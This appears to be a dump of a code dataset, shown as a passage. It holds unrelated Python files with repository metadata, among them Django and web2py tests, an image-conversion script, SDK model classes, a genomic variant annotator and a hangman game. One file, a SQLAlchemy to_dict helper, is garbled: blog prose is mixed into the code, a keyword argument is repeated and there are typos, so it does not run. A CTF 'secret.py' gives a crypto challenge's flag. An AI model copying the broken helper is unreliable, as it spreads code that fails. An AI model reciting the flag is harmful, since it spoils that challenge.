elif isinstance(new_storage[key],list):
new_storage[key] = list_dicts_to_storage(new_storage[key])
return new_storage
def check_api_header(response_object, web2py):
header = dict_to_storage(response_object.header)
assert web2py.request.application in header.application
assert 'Citations' in header.api
assert '1' == header.version
def test_citation_to_csl_json_api(client, web2py):
vars = {
'id': 'ASD1',
'type': 'article-journal',
'author': 'Rodriguez G., Gonzales Pepe',
'issued': '2017/6/02',
'issue': '2',
'number': '3',
'URL': "http://pepe.com"
}
url = URL('citation', 'api', 'to_csl_json', vars=vars)
client.get(url) # get a page
assert client.status == 200
response_object = dict_to_storage(json.loads(client.text))
check_api_header(response_object, web2py)
assert response_object.data.number == '3'
assert response_object.data.id == 'ASD1'
assert response_object.data.issue == '2'
assert response_object.data.type == 'article-journal'
assert response_object.data.URL == 'http://pepe.com'
assert response_object.data.author[0].family == 'Rodriguez'
assert response_object.data.author[0].given == 'G.'
assert response_object.data.author[1].family == 'Gonzales'
assert response_object.data.author[1].given == 'Pepe'
assert response_object.data.issued[0]['date-parts'][0] == '2017'
assert response_object.data.issued[0]['date-parts'][1] == '6'
assert response_object.data.issued[0]['date-parts'][2] == '2'
| 32.228571
| 70
| 0.656028
|
cf412c96e6b1a54a4991358ee02401f39db1b3a8
| 5,479
|
py
|
Python
|
django/contrib/auth/tests/test_models.py
|
izquierdo/django
|
9a2b07f1b45741da39a7606474aec3548780032b
|
[
"BSD-3-Clause"
] | null | null | null |
django/contrib/auth/tests/test_models.py
|
izquierdo/django
|
9a2b07f1b45741da39a7606474aec3548780032b
|
[
"BSD-3-Clause"
] | null | null | null |
django/contrib/auth/tests/test_models.py
|
izquierdo/django
|
9a2b07f1b45741da39a7606474aec3548780032b
|
[
"BSD-3-Clause"
] | null | null | null |
import warnings
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import (Group, User, SiteProfileNotAvailable,
UserManager)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.test import TestCase
from django.test.utils import override_settings
from django.utils import six
@skipIfCustomUser
@override_settings(USE_TZ=False, AUTH_PROFILE_MODULE='')
class ProfileTestCase(TestCase):
def test_site_profile_not_available(self):
user = User.objects.create(username='testclient')
# calling get_profile without AUTH_PROFILE_MODULE set
del settings.AUTH_PROFILE_MODULE
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
with six.assertRaisesRegex(self, SiteProfileNotAvailable,
"You need to set AUTH_PROFILE_MODULE in your project"):
user.get_profile()
# Bad syntax in AUTH_PROFILE_MODULE:
settings.AUTH_PROFILE_MODULE = 'foobar'
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
with six.assertRaisesRegex(self, SiteProfileNotAvailable,
"app_label and model_name should be separated by a dot"):
user.get_profile()
# module that doesn't exist
settings.AUTH_PROFILE_MODULE = 'foo.bar'
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
with six.assertRaisesRegex(self, SiteProfileNotAvailable,
"Unable to load the profile model"):
user.get_profile()
@skipIfCustomUser
@override_settings(USE_TZ=False)
class NaturalKeysTestCase(TestCase):
fixtures = ['authtestdata.json']
def test_user_natural_key(self):
staff_user = User.objects.get(username='staff')
self.assertEqual(User.objects.get_by_natural_key('staff'), staff_user)
self.assertEqual(staff_user.natural_key(), ('staff',))
def test_group_natural_key(self):
users_group = Group.objects.create(name='users')
self.assertEqual(Group.objects.get_by_natural_key('users'), users_group)
@skipIfCustomUser
@override_settings(USE_TZ=False)
class LoadDataWithoutNaturalKeysTestCase(TestCase):
fixtures = ['regular.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
@skipIfCustomUser
@override_settings(USE_TZ=False)
class LoadDataWithNaturalKeysTestCase(TestCase):
fixtures = ['natural.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
@skipIfCustomUser
class UserManagerTestCase(TestCase):
def test_create_user(self):
email_lowercase = 'normal@normal.com'
user = User.objects.create_user('user', email_lowercase)
self.assertEqual(user.email, email_lowercase)
self.assertEqual(user.username, 'user')
self.assertFalse(user.has_usable_password())
def test_create_user_email_domain_normalize_rfc3696(self):
# According to http://tools.ietf.org/html/rfc3696#section-3
# the "@" symbol can be part of the local part of an email address
returned = UserManager.normalize_email(r'Abc\@DEF@EXAMPLE.com')
self.assertEqual(returned, r'Abc\@DEF@example.com')
def test_create_user_email_domain_normalize(self):
returned = UserManager.normalize_email('normal@DOMAIN.COM')
self.assertEqual(returned, 'normal@domain.com')
def test_create_user_email_domain_normalize_with_whitespace(self):
returned = UserManager.normalize_email('email\ with_whitespace@D.COM')
self.assertEqual(returned, 'email\ with_whitespace@d.com')
def test_empty_username(self):
self.assertRaisesMessage(ValueError,
'The given username must be set',
User.objects.create_user, username='')
class IsActiveTestCase(TestCase):
"""
Tests the behavior of the guaranteed is_active attribute
"""
@skipIfCustomUser
def test_builtin_user_isactive(self):
user = User.objects.create(username='foo', email='foo@bar.com')
# is_active is true by default
self.assertEqual(user.is_active, True)
user.is_active = False
user.save()
user_fetched = User.objects.get(pk=user.pk)
# the is_active flag is saved
self.assertFalse(user_fetched.is_active)
@override_settings(AUTH_USER_MODEL='auth.IsActiveTestUser1')
def test_is_active_field_default(self):
"""
tests that the default value for is_active is provided
"""
UserModel = get_user_model()
user = UserModel(username='foo')
self.assertEqual(user.is_active, True)
# you can set the attribute - but it will not save
user.is_active = False
# there should be no problem saving - but the attribute is not saved
user.save()
user_fetched = UserModel._default_manager.get(pk=user.pk)
# the attribute is always true for newly retrieved instance
self.assertEqual(user_fetched.is_active, True)
| 38.314685
| 80
| 0.697025
|
6fa53094c5cf524b80e3a68853f4b7244a63724a
| 2,090
|
py
|
Python
|
codes/scripts/color2gray.py
|
achrefjarray/ESRGAN
|
76f0fcb53062cdb718ffb6b75112fe39f0d18a17
|
[
"Apache-2.0"
] | 106
|
2020-06-18T17:52:29.000Z
|
2022-03-16T08:53:10.000Z
|
codes/scripts/color2gray.py
|
achrefjarray/ESRGAN
|
76f0fcb53062cdb718ffb6b75112fe39f0d18a17
|
[
"Apache-2.0"
] | 10
|
2020-06-23T14:17:48.000Z
|
2022-02-21T07:40:19.000Z
|
codes/scripts/color2gray.py
|
achrefjarray/ESRGAN
|
76f0fcb53062cdb718ffb6b75112fe39f0d18a17
|
[
"Apache-2.0"
] | 15
|
2020-07-14T07:01:12.000Z
|
2022-03-16T08:53:09.000Z
|
import os
import os.path
import sys
from multiprocessing import Pool
import cv2
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from data.util import bgr2ycbcr
from utils.progress_bar import ProgressBar
def main():
"""A multi-thread tool for converting RGB images to gary/Y images."""
input_folder = '/home/carraz/datasets/DIV2K800/DIV2K800'
save_folder = '/home/carraz/datasets/DIV2K800/DIV2K800_gray'
mode = 'gray' # 'gray' | 'y': Y channel in YCbCr space
compression_level = 3 # 3 is the default value in cv2
# CV_IMWRITE_PNG_COMPRESSION from 0 to 9. A higher value means a smaller size and longer
# compression time. If read raw images during training, use 0 for faster IO speed.
n_thread = 20 # thread number
if not os.path.exists(save_folder):
os.makedirs(save_folder)
print('mkdir [{:s}] ...'.format(save_folder))
else:
print('Folder [{:s}] already exists. Exit...'.format(save_folder))
sys.exit(1)
# print('Parent process {:d}.'.format(os.getpid()))
img_list = []
for root, _, file_list in sorted(os.walk(input_folder)):
path = [os.path.join(root, x) for x in file_list] # assume only images in the input_folder
img_list.extend(path)
def update(arg):
pbar.update(arg)
pbar = ProgressBar(len(img_list))
pool = Pool(n_thread)
for path in img_list:
pool.apply_async(worker, args=(path, save_folder, mode, compression_level), callback=update)
pool.close()
pool.join()
print('All subprocesses done.')
def worker(path, save_folder, mode, compression_level):
img_name = os.path.basename(path)
img = cv2.imread(path, cv2.IMREAD_UNCHANGED) # BGR
if mode == 'gray':
img_y = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
img_y = bgr2ycbcr(img, only_y=True)
cv2.imwrite(
os.path.join(save_folder, img_name), img_y,
[cv2.IMWRITE_PNG_COMPRESSION, compression_level])
return 'Processing {:s} ...'.format(img_name)
if __name__ == '__main__':
main()
| 32.65625
| 100
| 0.673684
|
48d27d31439c661311e94e74c4d9ad1bede43a11
| 5,051
|
py
|
Python
|
src/oci/devops/models/update_deliver_artifact_stage_details.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 3
|
2020-09-10T22:09:45.000Z
|
2021-12-24T17:00:07.000Z
|
src/oci/devops/models/update_deliver_artifact_stage_details.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/devops/models/update_deliver_artifact_stage_details.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .update_build_pipeline_stage_details import UpdateBuildPipelineStageDetails
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateDeliverArtifactStageDetails(UpdateBuildPipelineStageDetails):
"""
Specifies the Deliver Artifacts stage.
"""
def __init__(self, **kwargs):
"""
Initializes a new UpdateDeliverArtifactStageDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.devops.models.UpdateDeliverArtifactStageDetails.build_pipeline_stage_type` attribute
of this class is ``DELIVER_ARTIFACT`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param display_name:
The value to assign to the display_name property of this UpdateDeliverArtifactStageDetails.
:type display_name: str
:param description:
The value to assign to the description property of this UpdateDeliverArtifactStageDetails.
:type description: str
:param build_pipeline_stage_type:
The value to assign to the build_pipeline_stage_type property of this UpdateDeliverArtifactStageDetails.
:type build_pipeline_stage_type: str
:param build_pipeline_stage_predecessor_collection:
The value to assign to the build_pipeline_stage_predecessor_collection property of this UpdateDeliverArtifactStageDetails.
:type build_pipeline_stage_predecessor_collection: oci.devops.models.BuildPipelineStagePredecessorCollection
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateDeliverArtifactStageDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this UpdateDeliverArtifactStageDetails.
:type defined_tags: dict(str, dict(str, object))
:param deliver_artifact_collection:
The value to assign to the deliver_artifact_collection property of this UpdateDeliverArtifactStageDetails.
:type deliver_artifact_collection: oci.devops.models.DeliverArtifactCollection
"""
self.swagger_types = {
'display_name': 'str',
'description': 'str',
'build_pipeline_stage_type': 'str',
'build_pipeline_stage_predecessor_collection': 'BuildPipelineStagePredecessorCollection',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'deliver_artifact_collection': 'DeliverArtifactCollection'
}
self.attribute_map = {
'display_name': 'displayName',
'description': 'description',
'build_pipeline_stage_type': 'buildPipelineStageType',
'build_pipeline_stage_predecessor_collection': 'buildPipelineStagePredecessorCollection',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'deliver_artifact_collection': 'deliverArtifactCollection'
}
self._display_name = None
self._description = None
self._build_pipeline_stage_type = None
self._build_pipeline_stage_predecessor_collection = None
self._freeform_tags = None
self._defined_tags = None
self._deliver_artifact_collection = None
self._build_pipeline_stage_type = 'DELIVER_ARTIFACT'
@property
def deliver_artifact_collection(self):
"""
Gets the deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:return: The deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:rtype: oci.devops.models.DeliverArtifactCollection
"""
return self._deliver_artifact_collection
@deliver_artifact_collection.setter
def deliver_artifact_collection(self, deliver_artifact_collection):
"""
Sets the deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:param deliver_artifact_collection: The deliver_artifact_collection of this UpdateDeliverArtifactStageDetails.
:type: oci.devops.models.DeliverArtifactCollection
"""
self._deliver_artifact_collection = deliver_artifact_collection
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 45.504505
| 245
| 0.724807
|
96ad4332e4d5d7537feb4b212ad4df304923520f
| 42
|
py
|
Python
|
2020/crypto/desez_300/secret.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | 1
|
2021-11-20T04:13:07.000Z
|
2021-11-20T04:13:07.000Z
|
2020/crypto/desez_300/secret.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | null | null | null |
2020/crypto/desez_300/secret.py
|
ZJGSIS/ZJGSUCTF-Challenges
|
460bfaa90f5d13a0958702fa4e479905713738bc
|
[
"MIT"
] | null | null | null |
flag = "zjgsuctf{d3s_c4n_brUtef0rce!!!!}"
| 21
| 41
| 0.714286
|
424dc221d2f81a9d02b5ef6a5d7e4a3411dba666
| 10,525
|
py
|
Python
|
dae/dae/tools/annotate_variants.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
dae/dae/tools/annotate_variants.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | 82
|
2019-07-22T11:44:23.000Z
|
2022-01-13T15:27:33.000Z
|
dae/dae/tools/annotate_variants.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import sys
import os.path
import time
import argparse
import pysam
from dae.genome import genome_access
from dae.genome.gene_models import load_gene_models
from dae.variant_annotation.annotator import (
VariantAnnotator as VariantAnnotation,
)
def cli_genome_options(parser):
genome_group = parser.add_argument_group("genome specification")
genome_group.add_argument(
"--gene-models-id",
"-T",
help="gene models ID <RefSeq, CCDS, knownGene>",
)
genome_group.add_argument(
"--gene-models-filename",
"--Traw",
help="outside gene models file path",
)
genome_group.add_argument(
"--gene-models-fileformat",
"--TrawFormat",
help="outside gene models format (refseq, ccds, knowngene)",
action="store",
)
genome_group.add_argument(
"--gene-mapping-filename",
"-I",
help="geneIDs mapping file",
default=None,
action="store",
)
genome_group.add_argument(
"--genome-id",
"-G",
help="genome ID <GATK_ResourceBundle_5777_b37_phiX174, hg19> ",
action="store",
)
genome_group.add_argument(
"--genome-filename",
"--Graw",
help="outside genome file name",
action="store",
)
genome_group.add_argument(
"--promoter-len",
"-P",
help="promoter length",
default=0,
type=int,
dest="promoter_len",
)
return parser
def parse_cli_genome_options(args):
genomic_sequence = None
gene_models = None
if args.gene_models_filename:
gene_models = load_gene_models(
args.gene_models_filename,
fileformat=args.gene_models_fileformat,
gene_mapping_file=args.gene_mapping_filename,
)
if args.genome_filename:
genomic_sequence = genome_access.open_ref(args.genome_filename)
if gene_models and genomic_sequence:
return genomic_sequence, gene_models
if genomic_sequence is None or gene_models is None:
from dae import GPFInstance
gpf = GPFInstance()
genome = gpf.genomes_db.get_genome(args.genome_id)
if genomic_sequence is None:
genomic_sequence = genome.get_genomic_sequence()
if gene_models is None:
gene_models = gpf.genomes_db.get_gene_models(
args.gene_models_id, args.genome_id
)
return genomic_sequence, gene_models
def cli_variants_options(parser):
location_group = parser.add_argument_group("variants location")
location_group.add_argument(
"--chrom", "-c", help="chromosome column number/name", action="store"
)
location_group.add_argument(
"--pos", "-p", help="position column number/name", action="store"
)
location_group.add_argument(
"--location",
"-x",
help="location (chr:pos) column number/name",
action="store",
)
variants_group = parser.add_argument_group("variants specification")
variants_group.add_argument(
"--variant", "-v", help="variant column number/name", action="store"
)
variants_group.add_argument(
"--ref",
"-r",
help="reference allele column number/name",
action="store",
)
variants_group.add_argument(
"--alt",
"-a",
help="alternative allele column number/name",
action="store",
)
parser.add_argument(
"--no-header",
"-H",
help="no header in the input file",
default=False,
action="store_true",
)
# variants_group.add_argument(
# "-t", help="type of mutation column number/name", action="store"
# )
# variants_group.add_argument(
# "-q", help="seq column number/name", action="store"
# )
# variants_group.add_argument(
# "-l", help="length column number/name", action="store"
# )
def parse_cli_variants_options(args):
columns = {}
if args.location is None:
if args.chrom is None and args.pos is None:
# default is location
columns["loc"] = "location"
else:
assert args.chrom is not None and args.pos is not None
columns["chrom"] = args.chrom
columns["position"] = args.pos
else:
assert args.chrom is None and args.pos is None
columns["loc"] = args.location
if args.variant is None:
if args.ref is None and args.alt is None:
# default is variant
columns["var"] = "variant"
else:
assert args.ref is not None and args.alt is not None
columns["ref"] = args.ref
columns["alt"] = args.alt
else:
assert args.ref is None and args.alt is None
columns["var"] = args.variant
return columns
def cli(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(
description="variants effect annotator",
conflict_handler="resolve",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
cli_genome_options(parser)
cli_variants_options(parser)
parser.add_argument(
"input_filename", nargs="?", help="input variants file name"
)
parser.add_argument(
"output_filename", nargs="?", help="output file name (default: stdout)"
)
args = parser.parse_args(argv)
genomic_sequence, gene_models = parse_cli_genome_options(args)
assert genomic_sequence is not None
assert gene_models is not None
annotator = VariantAnnotation(
genomic_sequence, gene_models, promoter_len=args.promoter_len
)
variant_columns = parse_cli_variants_options(args)
if args.input_filename == "-" or args.input_filename is None:
infile = sys.stdin
else:
assert os.path.exists(args.input_filename), args.input_filename
infile = open(args.input_filename, "r")
if args.output_filename is None:
outfile = sys.stdout
else:
outfile = open(args.output_filename, "w")
start = time.time()
header = None
if args.no_header:
for key, value in variant_columns.items():
variant_columns[key] = int(value)
else:
line = infile.readline().strip()
header = [c.strip() for c in line.split("\t")]
for key, value in variant_columns.items():
assert value in header
variant_columns[key] = header.index(value)
header.extend(["effectType", "effectGene", "effectDetails"])
print("\t".join(header), file=outfile)
counter = 0
for counter, line in enumerate(infile):
if line[0] == "#":
continue
columns = [c.strip() for c in line.split("\t")]
variant = {
key: columns[value] for key, value in variant_columns.items()
}
effects = annotator.do_annotate_variant(**variant)
desc = annotator.effect_description(effects)
columns.extend(desc)
print("\t".join(columns), file=outfile)
if (counter + 1) % 1000 == 0:
elapsed = time.time() - start
print(
f"processed {counter + 1} lines in {elapsed:0.2f} sec",
file=sys.stderr,
)
infile.close()
if args.output_filename:
outfile.close()
elapsed = time.time() - start
print(80 * "=", file=sys.stderr)
print(
f"DONE: {counter + 1} variants in {elapsed:0.2f} sec", file=sys.stderr,
)
print(80 * "=", file=sys.stderr)
def cli_vcf(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(
description="VCF variants effect annotator",
conflict_handler="resolve",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
cli_genome_options(parser)
parser.add_argument("input_filename", help="input VCF variants file name")
parser.add_argument(
"output_filename", nargs="?", help="output file name (default: stdout)"
)
args = parser.parse_args(argv)
genomic_sequence, gene_models = parse_cli_genome_options(args)
assert genomic_sequence is not None
assert gene_models is not None
annotator = VariantAnnotation(
genomic_sequence, gene_models, promoter_len=args.promoter_len
)
assert os.path.exists(args.input_filename), args.input_filename
infile = pysam.VariantFile(args.input_filename)
if args.output_filename is None:
outfile = sys.stdout
else:
outfile = open(args.output_filename, "w")
start = time.time()
# Transfer VCF header
header = infile.header
header.add_meta(
"variant_effect_annotation", "GPF variant effects annotation"
)
header.add_meta(
"variant_effect_annotation_command", '"{}"'.format(" ".join(sys.argv))
)
header.info.add("ET", ".", "String", "effected type")
header.info.add("EG", ".", "String", "effected gene")
header.info.add("ED", ".", "String", "effect details")
print(str(header), file=outfile, end="")
counter = 0
for counter, variant in enumerate(infile):
effect_types = []
effect_genes = []
effect_details = []
eg = ""
ed = ""
for alt in variant.alts:
effects = annotator.do_annotate_variant(
chrom=variant.chrom,
position=variant.pos,
ref=variant.ref,
alt=alt,
)
et, eg, ed = annotator.effect_description(effects)
ed = ed.replace(";", "|")
effect_types.append(et)
effect_genes.append(eg)
effect_details.append(ed)
effect_types = ",".join(effect_types)
effect_genes = ",".join(effect_genes)
effect_details = ",".join(effect_details)
variant.info["ET"] = effect_types
variant.info["EG"] = eg
variant.info["ED"] = ed
print(str(variant), file=outfile, end="")
if (counter + 1) % 1000 == 0:
elapsed = time.time() - start
print(
f"processed {counter + 1} variants in {elapsed:0.2f} sec",
file=sys.stderr,
)
infile.close()
if args.output_filename:
outfile.close()
elapsed = time.time() - start
print(80 * "=", file=sys.stderr)
print(
f"DONE: {counter + 1} variants in {elapsed:0.2f} sec", file=sys.stderr,
)
print(80 * "=", file=sys.stderr)
if __name__ == "__main__":
cli(sys.argv[1:])
| 29.900568
| 79
| 0.607126
|
c696c522d62cbfb8f8fef3eae996f419cea1e93b
| 412
|
py
|
Python
|
bookmark/models.py
|
mentix02/medialist-backend
|
397b1a382b12bab273360dadb0b3c32de43747cd
|
[
"MIT"
] | 1
|
2019-11-22T19:29:39.000Z
|
2019-11-22T19:29:39.000Z
|
bookmark/models.py
|
mentix02/medialist-backend
|
397b1a382b12bab273360dadb0b3c32de43747cd
|
[
"MIT"
] | 1
|
2019-11-25T09:50:07.000Z
|
2021-07-15T07:05:28.000Z
|
bookmark/models.py
|
mentix02/medialist-backend
|
397b1a382b12bab273360dadb0b3c32de43747cd
|
[
"MIT"
] | null | null | null |
from django.db import models
from author.models import Author
from article.models import Article
class Bookmark(models.Model):
article = models.ForeignKey(Article, on_delete=models.CASCADE)
author = models.ForeignKey(Author, on_delete=models.CASCADE, related_name='bookmarks')
class Meta:
ordering = ('-pk',)
def __str__(self) -> str:
return f'{self.article} {self.author}'
| 24.235294
| 90
| 0.711165
|
3362f023e362dc0dd981b5068d2ca97894eb5490
| 1,370
|
py
|
Python
|
python/hangman/hangman.py
|
parkerbxyz/exercism
|
2648a2654f067b0f44450ac0663ac49ee270565d
|
[
"MIT"
] | null | null | null |
python/hangman/hangman.py
|
parkerbxyz/exercism
|
2648a2654f067b0f44450ac0663ac49ee270565d
|
[
"MIT"
] | null | null | null |
python/hangman/hangman.py
|
parkerbxyz/exercism
|
2648a2654f067b0f44450ac0663ac49ee270565d
|
[
"MIT"
] | null | null | null |
# Game status categories
STATUS_WIN = 'win'
STATUS_LOSE = 'lose'
STATUS_ONGOING = 'ongoing'
class Hangman:
def __init__(self, word: str):
self.remaining_guesses = 9
self.status = STATUS_ONGOING
self.word = word
self.masked_word = '_' * len(word)
self.guesses: list = []
def guess(self, char: str):
if self.status != STATUS_ONGOING:
raise ValueError(f"The game has ended. You {self.status}.")
self._update_remaining_guesses(char)
self._update_masked_word(char)
self._update_status()
def _update_masked_word(self, char: str):
masked_chars = list(self.masked_word)
hits = [i for i, c in enumerate(self.word) if c == char]
for hit in hits:
masked_chars[hit] = char
self.masked_word = ''.join(masked_chars)
def _update_remaining_guesses(self, char: str):
if char not in self.word or char in self.guesses:
self.remaining_guesses -= 1
else:
self.guesses.append(char)
def _update_status(self):
if self.masked_word == self.word:
self.status = STATUS_WIN
elif self.remaining_guesses < 0:
self.status = STATUS_LOSE
def get_masked_word(self) -> str:
return self.masked_word
def get_status(self) -> str:
return self.status
| 29.782609
| 71
| 0.618248
|
e3bf0c084d6460b2f11931b21c6d2d21e7a4db76
| 6,175
|
py
|
Python
|
ganimides_server/ganimides_database/_good1.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
ganimides_server/ganimides_database/_good1.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | 1
|
2021-06-02T00:36:03.000Z
|
2021-06-02T00:36:03.000Z
|
ganimides_server/ganimides_database/_good1.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
#https://wakatime.com/blog/32-flask-part-1-sqlalchemy-models-to-json
from flask import json
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.orm.attributes import QueryableAttribute
from wakatime_website import app
db = SQLAlchemy(app)
class BaseModel(db.Model):
__abstract__ = True
def to_dict(self, show=None, _hide=[], _path=None):
"""Return a dictionary representation of this model."""
show = show or []
hidden = self._hidden_fields if hasattr(self, "_hidden_fields") else []
default = self._default_fields if hasattr(self, "_default_fields") else []
default.extend(['id', 'modified_at', 'created_at'])
if not _path:
_path = self.__tablename__.lower()
def prepend_path(item):
item = item.lower()
if item.split(".", 1)[0] == _path:
return item
if len(item) == 0:
return item
if item[0] != ".":
item = ".%s" % item
item = "%s%s" % (_path, item)
return item
_hide[:] = [prepend_path(x) for x in _hide]
show[:] = [prepend_path(x) for x in show]
columns = self.__table__.columns.keys()
relationships = self.__mapper__.relationships.keys()
properties = dir(self)
ret_data = {}
for key in columns:
if key.startswith("_"):
continue
check = "%s.%s" % (_path, key)
if check in _hide or key in hidden:
continue
if check in show or key in default:
ret_data[key] = getattr(self, key)
for key in relationships:
if key.startswith("_"):
continue
check = "%s.%s" % (_path, key)
if check in _hide or key in hidden:
continue
if check in show or key in default:
_hide.append(check)
is_list = self.__mapper__.relationships[key].uselist
if is_list:
items = getattr(self, key)
if self.__mapper__.relationships[key].query_class is not None:
if hasattr(items, "all"):
items = items.all()
ret_data[key] = []
for item in items:
ret_data[key].append(
item.to_dict(
show=list(show),
_hide=list(_hide),
_path=("%s.%s" % (_path, key.lower())),
)
)
else:
if (
self.__mapper__.relationships[key].query_class is not None
or self.__mapper__.relationships[key].instrument_class
is not None
):
item = getattr(self, key)
if item is not None:
ret_data[key] = item.to_dict(
show=list(show),
_hide=list(_hide),
_path=("%s.%s" % (_path, key.lower())),
)
else:
ret_data[key] = None
else:
ret_data[key] = getattr(self, key)
for key in list(set(properties) - set(columns) - set(relationships)):
if key.startswith("_"):
continue
if not hasattr(self.__class__, key):
continue
attr = getattr(self.__class__, key)
if not (isinstance(attr, property) or isinstance(attr, QueryableAttribute)):
continue
check = "%s.%s" % (_path, key)
if check in _hide or key in hidden:
continue
if check in show or key in default:
val = getattr(self, key)
if hasattr(val, "to_dict"):
ret_data[key] = val.to_dict(
show=list(show),
_hide=list(_hide), _path=("%s.%s" % (_path, key.lower()))
_path=('%s.%s' % (path, key.lower())),
)
else:
try:
ret_data[key] = json.loads(json.dumps(val))
except:
pass
return ret_data
class User(BaseModel):
id = db.Column(UUID(), primary_key=True, default=uuid.uuid4)
username = db.Column(db.String(), nullabe=False, unique=True)
password = db.Column(db.String())
email_confirmed = db.Column(db.Boolean())
modified_at = db.Column(db.DateTime())
created_at = db.Column(db.DateTime(), nullable=False, default=datetime.utcnow)
_default_fields = [
"username",
"joined_recently",
]
_hidden_fields = [
"password",
]
_readonly_fields = [
"email_confirmed",
]
@property
def joined_recently(self):
return self.created_at > datetime.utcnow() - timedelta(days=3)
user = User(username="zzzeek")
db.session.add(user)
db.session.commit()
print(user.to_dict())
Which prints:
{
'id': UUID('488345de-88a1-4c87-9304-46a1a31c9414'),
'username': 'zzzeek',
'joined_recently': True,
'modified_at': None,
'created_at': datetime.datetime(2018, 7, 11, 6, 28, 56, 905379),
}
And is easily jsonified with:
json.dumps(user.to_dict())
customize which columns from User are included in the returned dictionary. For example, if you want to include email_confirmed in your serialized user you would do:
print(user.to_dict(show=['email_confirmed', 'password']))
Which prints:
{
'id': UUID('488345de-88a1-4c87-9304-46a1a31c9414'),
'username': 'zzzeek',
'email_confirmed': None,
'joined_recently': True,
'modified_at': None,
'created_at': datetime.datetime(2018, 7, 11, 6, 28, 56, 905379),
}
Also notice that password was not included, since it’s listed as hidden on User.
| 35.085227
| 164
| 0.508016
|
9ec84094526a13945cd7694c6984908a74159c69
| 770
|
py
|
Python
|
generated-libraries/python/netapp/job/job_log_config_modify_iter_key_td.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | 2
|
2017-03-28T15:31:26.000Z
|
2018-08-16T22:15:18.000Z
|
generated-libraries/python/netapp/job/job_log_config_modify_iter_key_td.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
generated-libraries/python/netapp/job/job_log_config_modify_iter_key_td.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
from netapp.netapp_object import NetAppObject
class JobLogConfigModifyIterKeyTd(NetAppObject):
"""
Key typedef for table jm_admin_log
"""
_key_0 = None
@property
def key_0(self):
"""
Field module
"""
return self._key_0
@key_0.setter
def key_0(self, val):
if val != None:
self.validate('key_0', val)
self._key_0 = val
@staticmethod
def get_api_name():
return "job-log-config-modify-iter-key-td"
@staticmethod
def get_desired_attrs():
return [
'key-0',
]
def describe_properties(self):
return {
'key_0': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
| 22
| 87
| 0.548052
|
044f320fe7d5b23da63d9a9c89e78f60acafc0cc
| 5,382
|
py
|
Python
|
filer/admin/fileadmin.py
|
pietzschke/django-filer
|
9c5ddc8a1327e2e3bf0652b0b73c43c1e5594e36
|
[
"BSD-3-Clause"
] | null | null | null |
filer/admin/fileadmin.py
|
pietzschke/django-filer
|
